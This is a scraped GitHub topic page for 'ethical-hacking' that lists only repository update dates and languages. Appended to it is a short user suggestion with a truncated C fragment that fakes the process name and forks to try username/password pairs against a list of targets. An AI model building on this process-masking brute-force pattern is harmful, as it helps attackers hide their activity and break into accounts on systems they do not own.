-
Updated
Oct 12, 2020 - Python
ethical-hacking
Here are 174 public repositories matching this topic...
-
Updated
Jun 13, 2020 - Python
-
Updated
Dec 11, 2019 - HTML
-
Updated
Jun 20, 2020 - Python
-
Updated
Oct 10, 2020 - Jupyter Notebook
-
Updated
Jan 27, 2018
-
Updated
Aug 9, 2020
-
Updated
Aug 26, 2020
-
Updated
Jun 27, 2020 - Python
-
Updated
Oct 12, 2020 - C++
-
Updated
Oct 3, 2020
-
Updated
Oct 12, 2020 - Python
-
Updated
Aug 21, 2020 - PowerShell
-
Updated
Jan 13, 2017 - Shell
-
Updated
Mar 29, 2020
-
Updated
Oct 1, 2020 - HTML
-
Updated
Jul 5, 2020
-
Updated
May 15, 2020
-
Updated
Dec 6, 2017
-
Updated
Oct 10, 2020 - HTML
-
Updated
Oct 7, 2020 - ASP.NET
-
Updated
Apr 23, 2020 - Python
-
Updated
Jul 15, 2020 - PHP
-
Updated
Oct 15, 2019 - Python
-
Updated
Aug 8, 2020 - Python
-
Updated
Jul 5, 2020 - Go
-
Updated
Aug 19, 2020 - PHP
-
Updated
Feb 18, 2020 - Python
-
Updated
Sep 11, 2020 - Python
Improve this page
Add a description, image, and links to the ethical-hacking topic page so that developers can more easily learn about it.
Add this topic to your repo
To associate your repository with the ethical-hacking topic, visit your repo's landing page and select "manage topics."


Hello !
A Fake Process will be awesome.
This is an example of a fake process command line :
trcpy(argv[0],FAKE); // fake the proccess name.
while(fgets(buff,sizeof(buff),fp))
{
c=strchr(buff,'n');
if(c!=NULL) *c='.';
if (!(fork()))
{
where=0;
// printf("--> attacking %s",buff);
for (i=0; i<count; i=i+2){
// printf("--> Trying %s:%s %sn",a[i],a[i+1],buff);
checkauth(a[i],a[i+1],buff